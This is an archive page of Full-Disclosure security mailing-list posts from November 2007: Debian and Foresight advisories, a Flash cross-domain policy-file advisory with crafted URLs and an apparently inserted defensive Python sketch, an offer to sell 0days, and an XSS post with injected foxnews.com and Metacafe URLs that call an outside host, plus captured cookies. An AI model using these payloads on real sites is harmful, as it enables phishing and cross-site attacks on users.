
2007-11-09 Thread Thijs Kinkhorst
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1405-1                    [EMAIL PROTECTED]
http://www.debian.org/security/                         Thijs Kinkhorst
November 9th, 2007  http://www.debian.org/security/faq
- --

Package: zope-cmfplone
Vulnerability  : missing input sanitising
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2007-5741
Debian Bug : 449523

It was discovered that Plone, a web content management system, allows
remote attackers to execute arbitrary code via specially crafted web
browser cookies.

The oldstable distribution (sarge) is not affected by this problem.

For the stable distribution (etch) this problem has been fixed in
version 2.5.1-4etch1.

For the unstable distribution (sid) this problem will be fixed soon.

We recommend that you upgrade your zope-cmfplone package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

  Source archives:


http://security.debian.org/pool/updates/main/z/zope-cmfplone/zope-cmfplone_2.5.1-4etch1.dsc
  Size/MD5 checksum: 1114 dccc6173d55e9fedbe5a7b91d84a5721

http://security.debian.org/pool/updates/main/z/zope-cmfplone/zope-cmfplone_2.5.1-4etch1.diff.gz
  Size/MD5 checksum:10922 3a83d9323ac5285ac3d5cbde1d54e5f7

http://security.debian.org/pool/updates/main/z/zope-cmfplone/zope-cmfplone_2.5.1.orig.tar.gz
  Size/MD5 checksum:  1064993 b48215d46aafa9e1f12196263d86a191

  Architecture independent components:


http://security.debian.org/pool/updates/main/z/zope-cmfplone/plone-site_2.5.1-4etch1_all.deb
  Size/MD5 checksum: 9828 318b81cff9a5bf4bf352743c46095693

http://security.debian.org/pool/updates/main/z/zope-cmfplone/zope-cmfplone_2.5.1-4etch1_all.deb
  Size/MD5 checksum:  1190788 49e266b7a7910079c92e039a910c4903


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: [EMAIL PROTECTED]
Package info: `apt-cache show pkg' and http://packages.debian.org/pkg
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHNOEdXm3vHE4uyloRAlD0AKDUgsEo+4+DL/LpLB46Cte3CjD4ZACeN08A
WWoKssOksgDzYD5hEmzLvlY=
=x7J9
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [SECURITY] [DSA 1406-1] New horde3 packages fix several vulnerabilities

2007-11-09 Thread Thijs Kinkhorst
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1406-1                    [EMAIL PROTECTED]
http://www.debian.org/security/                         Thijs Kinkhorst
November 9th, 2007  http://www.debian.org/security/faq
- --

Package: horde3
Vulnerability  : several
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2006-3548 CVE-2006-3549 CVE-2006-4256 CVE-2007-1473 
CVE-2007-1474
Debian Bug : 378281 383416 434045

Several remote vulnerabilities have been discovered in the Horde web
application framework. The Common Vulnerabilities and Exposures project
identifies the following problems:

CVE-2006-3548

Moritz Naumann discovered that Horde allows remote attackers
to inject arbitrary web script or HTML in the context of a logged
in user (cross site scripting).

This vulnerability applies to oldstable (sarge) only.   

CVE-2006-3549

Moritz Naumann discovered that Horde does not properly restrict
its image proxy, allowing remote attackers to use the server as a
proxy.

This vulnerability applies to oldstable (sarge) only.

CVE-2006-4256

Marc Ruef discovered that Horde allows remote attackers to
include web pages from other sites, which could be useful for
phishing attacks.

This vulnerability applies to oldstable (sarge) only.

CVE-2007-1473

Moritz Naumann discovered that Horde allows remote attackers
to inject arbitrary web script or HTML in the context of a logged
in user (cross site scripting).

This vulnerability applies to both stable (etch) and oldstable (sarge).

CVE-2007-1474

iDefense discovered that the cleanup cron script in Horde
allows local users to delete arbitrary files.

This vulnerability applies to oldstable (sarge) only.


For the old stable distribution (sarge) these problems have been fixed in
version 3.0.4-4sarge6.

For the stable distribution (etch) these problems have been fixed in
version 3.1.3-4etch1.

For the unstable distribution (sid) these problems have been fixed in
version 3.1.4-1.

We recommend that you upgrade your horde3 package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:


http://security.debian.org/pool/updates/main/h/horde3/horde3_3.0.4-4sarge6.dsc
  Size/MD5 checksum:  920 a829a3791ed40777b0a4995be6727f13

http://security.debian.org/pool/updates/main/h/horde3/horde3_3.0.4-4sarge6.diff.gz
  Size/MD5 checksum:13978 ab0dc18c4744b21919c154ac81600ad7

http://security.debian.org/pool/updates/main/h/horde3/horde3_3.0.4.orig.tar.gz
  Size/MD5 checksum:  3378143 e2221d409ba1c8841ce4ecee981d7b61

  Architecture independent components:


http://security.debian.org/pool/updates/main/h/horde3/horde3_3.0.4-4sarge6_all.deb
  Size/MD5 checksum:  3437942 f2cd9a0c7cb7e800d357d206d9f19841


Debian GNU/Linux 4.0 alias etch
- ---

  Source archives:


http://security.debian.org/pool/updates/main/h/horde3/horde3_3.1.3-4etch1.dsc
  Size/MD5 checksum:  974 9fe3ec9d81a0d0c8ec6dd2ae3e14ed40

http://security.debian.org/pool/updates/main/h/horde3/horde3_3.1.3-4etch1.diff.gz
  Size/MD5 checksum:10633 84cad3aed2026c8a6358891897a15ee7

http://security.debian.org/pool/updates/main/h/horde3/horde3_3.1.3.orig.tar.gz
  Size/MD5 checksum:  5232958 fbc56c608ac81474b846b1b4b7bb5ee7

  Architecture independent components:


http://security.debian.org/pool/updates/main/h/horde3/horde3_3.1.3-4etch1_all.deb
  Size/MD5 checksum:  5270226 34a3af59a3469722ecf832948d390cea

  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: [EMAIL PROTECTED]
Package info: `apt-cache show pkg' and http://packages.debian.org/pkg
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHNOM0Xm3vHE4uyloRAhqCAKDW38OVpHkAYAfr9LNzvh5k/j+8fQCg29kw
KknLxPttFWUKWRsaCB5PesA=
=SoAf
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: 

[Full-disclosure] List Charter

2007-11-09 Thread John Cartwright

[Full-Disclosure] Mailing List Charter
John Cartwright [EMAIL PROTECTED]
 

- Introduction & Purpose -

This document serves as a charter for the [Full-Disclosure] mailing 
list hosted at lists.grok.org.uk.

The list was created on 9th July 2002 by Len Rose, and is primarily 
concerned with security issues and their discussion.  The list is 
administered by John Cartwright.

The Full-Disclosure list is hosted and sponsored by Secunia.


- Subscription Information -

Subscription/unsubscription may be performed via the HTTP interface 
located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure.

Alternatively, commands may be emailed to 
[EMAIL PROTECTED], send the word 'help' in 
either the message subject or body for details.

 
- Moderation & Management -

The [Full-Disclosure] list is unmoderated. Typically posting will be
restricted to members only, however the administrators may choose to 
accept submissions from non-members based on individual merit and 
relevance.

It is expected that the list will be largely self-policing, however in
special circumstances (eg spamming, misappropriation) then offending 
members may be removed from the list by the management.

An archive of postings is available at 
http://lists.grok.org.uk/pipermail/full-disclosure/.
 

- Acceptable Content -

Any information pertaining to vulnerabilities is acceptable, for 
instance announcement and discussion thereof, exploit techniques and 
code, related tools and papers, and other useful information.

Gratuitous advertisement, product placement, or self-promotion is 
forbidden.  Disagreements, flames, arguments, and off-topic discussion 
should be taken off-list wherever possible.

Humour is acceptable in moderation, providing it is inoffensive. 
Politics should be avoided at all costs.

Members are reminded that due to the open nature of the list, they 
should use discretion in executing any tools or code distributed via
this list.
 

- Posting Guidelines -

The primary language of this list is English. Members are expected to 
maintain a reasonable standard of netiquette when posting to the list. 

Quoting should not exceed that which is necessary to convey context, 
this is especially relevant to members subscribed to the digested 
version of the list.

The use of HTML is discouraged, but not forbidden. Signatures will 
preferably be short and to the point, and those containing 
'disclaimers' should be avoided where possible.

Attachments may be included if relevant or necessary (e.g. PGP or 
S/MIME signatures, proof-of-concept code, etc) but must not be active 
(in the case of a worm, for example) or malicious to the recipient.

Vacation messages should be carefully configured to avoid replying to 
list postings. Offenders will be excluded from the mailing list until 
the problem is corrected.

Members may post to the list by emailing 
[EMAIL PROTECTED] Do not send subscription/
unsubscription mails to this address, use the -request address 
mentioned above.


- Charter Additions/Changes -

The list charter will be published at 
http://lists.grok.org.uk/full-disclosure-charter.html.

In addition, the charter will be posted monthly to the list by the 
management.

Alterations will be made after consultation with list members and a 
consensus has been reached.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Canonicalization issues in Flash Cross-domain policy file request

2007-11-09 Thread s4tan
=
Canonicalization issues in Flash Cross-domain policy file request
=

Vendor:  Adobe (http://www.adobe.com)
Software Affected:   Macromedia Flash Player
Software Version:Flash 9.0 r31

Impact (CVSSv2 score): medium (6.4/10, vector:
AV:N/AC:L/Au:N/C:N/I:P/A:P)

Discovered by:   Antonio "s4tan" Parata

Discovery Date:2007-05-18
Release Date:2007-11-09
Last Update:2007-11-09


1. Summary
==

From the Adobe web site: "A policy file is a simple XML file that gives
the Flash Player permission to access data from a given domain without
displaying a security dialog. When placed on a server, it tells the
Flash Player to allow direct access to data on that server, without
prompting the user to grant access."

It is possible to alter the URL of the request that fetches the
cross-domain policy file.


2. Vulnerability Analysis
=

2.1 Overview


The policy file is usually placed in the document root of the web server
with the name crossdomain.xml, unless a different path is specified.

When a request to an external URL is made, Flash first requests the
policy file from the external domain, and only then (if the policy
permits it) issues the user's request.

By adding certain special characters to the URL it is possible to change
the path used in the request for the policy file.

Consider the following simple .mxml file:

<?xml version="1.0" encoding="utf-8"?>
<mx:Application xmlns:mx="http://www.adobe.com/2006/mxml" layout="absolute">

    <mx:HTTPService id="request" useProxy="false"></mx:HTTPService>
    <mx:TextInput id="src" x="251" y="174"/>
    <mx:Button label="Send!" x="430" y="174" id="sendButton"
        click="clickSendButton(event)"/>

    <mx:Script>
        <![CDATA[

        import flash.events.MouseEvent;

        // Take whatever the user typed and use it, unmodified, as the
        // target URL of the HTTPService request.
        private function clickSendButton(event:MouseEvent):void {
            request.url = src.text;
            request.send();
        }

        ]]>
    </mx:Script>

</mx:Application>

You can compile it with mxmlc.

If you enter in the text area the url
http://www.somesite.com/some/path/index.php,
before the request is done Flash makes a request to /crossdomain.xml to
retrieve the cross-domain policy file. If the policy permits the
request, another request to /some/path/index.php is made.

2.2 Attack example
--

On Firefox (v 2.0.0.3), if you insert the following URL
http://www.somesite.com?http=
the request for the policy file will be:

GET /?http=/crossdomain.xml HTTP/1.1

so instead of the policy file you retrieve the HTML of the home page.
If you insert the URL http://www.somesite.com?aaa=bbb&ccc=ddd#, the
request for the policy file will be:

GET /?aaa=bbb&ccc=ddd HTTP/1.1

On Internet Explorer 7 we have a lot more fun. Internet Explorer
automatically converts \ to /.

So if we insert the following URL
http://www.somesite.it\path/to/wathever/index.php?param=value&cross=
the request for the policy file will be:

GET /path/crossdomain.xml HTTP/1.1

Then if we insert the following URL
http://www.somesite.it\path\to\wathever\index.php?aaa=bbb&ccc=
the request for the policy file will be:

GET /path/to/wathever/index.php?aaa=bbb&ccc=/crossdomain.xml HTTP/1.1

We can arbitrarily modify the path of the request for the cross-domain
policy file.

Not only the HTTPService object is vulnerable, but also the WebService
object (as an example try the URL http://www.somesite.it?wsdl=WSDL).
Other functions that make remote requests may be affected as well.

2.3 What a malicious attacker can do


By modifying the path, an attacker can make the victim's Flash Player
issue a GET request for an arbitrary URL on the target web server (for
example to exploit a CSRF vulnerability on a third-party web site).
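
The behaviour reported above, and the two checks a practitioner would want
against it, as an added example that is not Adobe's code and not part of
the advisory. The function flash_policy_request is a reconstruction: a
model in which the player takes everything between "://" and the first "/"
as the authority, appends /crossdomain.xml, and leaves the result to the
browser's URL parser. That assumption is mine, but it reproduces all five
request lines given in section 2 (the normal case, both Firefox cases and
both IE cases). The second function is the derivation a client should use,
and the third is a server-side log check for steered policy-file fetches.

```python
import re
from urllib.parse import urlsplit

POLICY_FILE = "/crossdomain.xml"
# Plain host[:port] only; anything else in the authority is refused, not repaired.
_HOST_RE = re.compile(r"^[A-Za-z0-9.-]+(:\d{1,5})?$")


def flash_policy_request(url, ie_backslash=False):
    """Reconstruction (an assumption, not Adobe's code) of the reported
    behaviour: the authority is everything up to the first '/', the policy
    file name is appended, and the browser's URL parser does the rest.
    ie_backslash=True models the '\\' to '/' rewrite IE 7 applies.
    Returns the request line the server would see (fragment dropped)."""
    if "://" not in url:
        raise ValueError("absolute URL expected")
    scheme, rest = url.split("://", 1)
    authority = rest.split("/", 1)[0]           # '?' and '#' are not delimiters here
    policy = "%s://%s%s" % (scheme, authority, POLICY_FILE)
    if ie_backslash:
        policy = policy.replace("\\", "/")
    parts = urlsplit(policy)                    # the browser's view of the string
    target = parts.path or "/"
    if parts.query:
        target += "?" + parts.query
    return "GET %s HTTP/1.1" % target


def policy_url(url):
    """Correct derivation: the policy file lives at scheme://authority/crossdomain.xml,
    so only scheme and authority are used, and an authority that is not a plain
    host[:port] (backslashes, '?', '#', userinfo...) yields None."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not _HOST_RE.match(parts.netloc):
        return None
    return "%s://%s%s" % (parts.scheme, parts.netloc, POLICY_FILE)


def suspicious_policy_fetch(request_line):
    """Server-side check over an access-log request line: a target that names
    crossdomain.xml but is not exactly 'GET /crossdomain.xml' came from a
    client steered by a crafted URL."""
    fields = request_line.split(" ")
    if len(fields) != 3:
        return False
    method, target, _version = fields
    return "crossdomain.xml" in target and not (method == "GET" and target == POLICY_FILE)


if __name__ == "__main__":
    # Constructed inputs: the URLs from section 2 of the advisory.
    for url, ie in (("http://www.somesite.com/some/path/index.php", False),
                    ("http://www.somesite.com?http=", False),
                    ("http://www.somesite.com?aaa=bbb&ccc=ddd#", False),
                    ("http://www.somesite.it\\path/to/wathever/index.php?param=value&cross=", True),
                    ("http://www.somesite.it\\path\\to\\wathever\\index.php?aaa=bbb&ccc=", True)):
        print(flash_policy_request(url, ie), "| correct:", policy_url(url))
```

Note the limit of the log check: in the fragment case the policy-file
name is cut off entirely and the server only sees GET /?aaa=bbb&ccc=ddd,
which is indistinguishable from an ordinary request, so the client-side
derivation is the real fix and the log check is a supplement.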


3. Acknowledgments
==

I would like to acknowledge Alberto "icesurfer" Revelli and Stefano "wisec"
Di Paola for helping me in writing the advisory.


4. Contact
==

Antonio s4tan Parata - 2007
web site: http://www.ictsc.it
mail: [EMAIL PROTECTED], [EMAIL PROTECTED]


5. Disclaimer
=

Copyright (c) 2007 Antonio Parata

The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

6. Revision History
===

2007-11-09: Initial release

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] still some 0days to sell

2007-11-09 Thread Joey Mengele
Yes, Michael is the expert. Everyone knows private bugs are not 
0day, only public bugs! LOLOLOLOL! Hire this guy!

J


On Fri, 09 Nov 2007 12:32:35 -0500 Michael Bann 
[EMAIL PROTECTED] wrote:
Ok, first off, this is FULL DISCLOSURE. Perhaps you meant to send
this to I'm a haxor. Don't worry, common mistake.

Second, I highly doubt you have some 0days, if any at all.
Perhaps a few bugs/buffer under/over flows, but nothing that, in the
computer security field, would justify the title 0day.

Cheers,

Mike

Juergen Marester wrote:
 Hi,

 I still have some 0days (just a few now) to sell about windows 
and linux.
 information by e-mail.

 see you,

 Juergen

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
   

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

--
Click for your daily horoscope, learn about money, love  family.
http://tagline.hushmail.com/fc/Ioyw6h4c4ZA3zegZxPh1WHd5UE5uH4AWMvEAVEbALzMd94GSjFvleI/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] MS explorer.exe high_load caused by malformed png

2007-11-09 Thread Code Audit Labs
see
http://hi.baidu.com/codeauditlabs/blog/item/00c6d00134386b00738da595.html


-- 
Code Audit Labs
http://www.vulnhunt.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] FLEA-2007-0063-1 perl

2007-11-09 Thread Foresight Linux Essential Announcement Service
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Foresight Linux Essential Advisory: 2007-0063-1
Published: 2007-11-09

Rating: Minor

Updated Versions:
perl=/[EMAIL PROTECTED]:devel//1/5.8.7-8.2-1
group-dist=/[EMAIL PROTECTED]:1-devel//1/1.4.1-0.2-2

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5116

Description:
Previous versions of the perl package contain weaknesses when evaluating
regular expressions.

If a system is serving a perl-based web application that evaluates
remote input as a regular expression, an attacker may be be able to
exploit these weaknesses to execute arbitrary, attacker-provided code on
the system, potentially elevating this to a remote, deterministic
unauthorized access vulnerability.

Foresight Linux does not, by default, enable or contain any such services.

- ---

Copyright 2007 Foresight Linux Project
This file is distributed under the terms of the MIT License.
A copy is available at http://www.foresightlinux.org/permanent/mit-license.html
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.7 (GNU/Linux)
=Vbpl
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] 0day Shockwave and Flash XSS Fish Exploits on Youtube, Revver, Metacafe, Google.

2007-11-09 Thread XSS Worm XSS Security Information Portal
Foxnews 0day XSS Shock Attack
http://www.foxnews.com/video2/launchPage.html?100207/100207_imag_PETITE%253Ch1%253E%253Ca%2520href=//xssworm.com%253EXSS%2520Worm%2520Web%25202.0%2520Security%2520Portal%253C/a%253E%253Cbr%253E%253C/h1%253EWith%2520new%25200day%2520Fox%2520News%2520XSS%2520Hacking%2520Video!
Demo link to send to a fish:

http://www.foxnews.com/video2/launchPage.html?http://localhost/

With netcat listen on localhost :

listening on [any] 80 ...
connect to localhost [127.0.0.1] from localhost [127.0.0.1] 1964
GET
/E05510/a3/0/3/1380/1/0/116282DDC64/0/0//312340660.gif?D=DM%5FLOC%3D
http%3A%2F%2Fwww%252Efoxnews%252Ecom%2Fvideo2%2FlaunchPage%252Ehtml%253Fhttp%3A%
2F%2Flocalhost%2526pageType%253Dmisc%2526miscPage%253DVideo%252520Launch%252520P
age%26DM%5FREF%3D%26DM%5FTIT%3DFOXNews%252Ecom%20%2D%20Video%20Launch%20Page%20%
2D%20FOXNews%252Ecom%26DM%5FEOM%3D1 HTTP/1.1
Host: pix01.revsci.net
User-Agent: Mozilla/5.0 (Mandriver)
Accept: image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.foxnews.com/video2/launchPage.html?http://localhost
Cookie: [EMAIL PROTECTED];
NETSEGS_J05532=960C7930BE970CE4J05532
3F149836472757D904723FE85C2C6A1738F3B885FCA46DE74CFF355ED


I think maybe this is to make many shock waves with XSS!
Zero Day Shockwave SWF Player Exploit with XSS Attack:
http://xssworm.blogvis.com/12/xssworm/zero-day-shockwave-swf-player-exploit-with-xss-attack/
in the hacking metacafe we discover Shockwave XSS 0day attack to use by
blackhat to steal fish:

MetaCafe XSS Worm Vulnerabilities - ZeroDay Shockwave Attack POC - :

http://www.metacafe.com/f/fvp/EmbedVideoPlayer_5.1.0.0.swf?itemID=755028&mediaURL=http://xssworm.com/?fish&normalizedTitle=space_trip&isViral=false&isWatermarked=false&postrollContentURL=http://l3images.metacafe.com/f/fvp/EmbedItemSelector_3.0.0.5.swf&networkingAllowed=true


We see this outputs in xssworm.com log - :


GET /crossdomain.xml HTTP/1.1
Host: metacafe.122.2o7.net
Cookie: s_vi_xxhybx7BxBxxclx7Fx7D=[CS]v4|472A0D2D00060B2-290B294DB|472A0
D2D[CE];
s_vihfex7Ekx7Dx7Fzxx=[CS]v4|47208A0C4D74-A170C543A87|472DA4DB[
CE]; s_vi_jdghjlgdijg=[CS]v4|472605E7606-A170BAE639DC|4726056DCE]
s_vi
_wzvqcdsx7F7×60qx7isx7Fx7D[CS]v4|.

snips…

We see many more serious vulnerability in the web 2.0 today. As you must be
sure to visit http://xssworm.com/ security portal to discuss this shock
problem  many thanks for your reply. I am interested.

vaj


-- 
Francesco Vaj [CISSP - GIAC]
CSS Security Researcher
mailto:[EMAIL PROTECTED]
aim: XSS Cross Site
--
XSS Cross Site Scripting Attacks and
Web 2.0 AJAX Security Information News -
http://xssworm.com/
--
Vaj, bella vaj.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/